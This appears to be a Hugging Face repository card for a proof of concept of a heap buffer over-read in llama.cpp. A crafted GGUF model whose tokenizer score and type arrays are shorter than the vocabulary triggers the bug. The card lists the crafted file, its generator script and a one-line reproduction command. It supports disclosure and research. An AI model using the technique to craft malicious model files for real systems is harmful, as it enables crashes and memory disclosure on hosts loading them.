YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
llama-cpp-scores-oob-poc
Heap Buffer Over-Read via Mismatched Tokenizer Array Lengths in GGUF
This repository contains a proof-of-concept (PoC) demonstrating a heap buffer over-read vulnerability in llama.cpp caused by mismatched tokenizer array lengths in a crafted GGUF model file.
Vulnerability Summary
When loading a GGUF model, llama.cpp reads tokenizer metadata arrays (such as token scores and token types) and assumes their lengths match the vocabulary size. A specially crafted GGUF file can provide arrays with fewer elements than the declared vocabulary size, causing llama.cpp to read beyond the bounds of the allocated heap buffer when accessing token scores.
This results in a heap buffer over-read, which may lead to information disclosure or a crash.
Files
| File | Description |
|---|---|
poc_scores_oob.gguf |
Crafted GGUF model file that triggers the vulnerability |
poc_scores_oob.py |
Python script used to generate the malicious GGUF file |
Reproduction
# Build llama.cpp, then run with the crafted model:
./llama-cli -m poc_scores_oob.gguf -p "test"
Disclaimer
This PoC is provided for security research and responsible disclosure purposes only. Do not use it for malicious purposes.
- Downloads last month
- 1
We're not able to determine the quantization variants.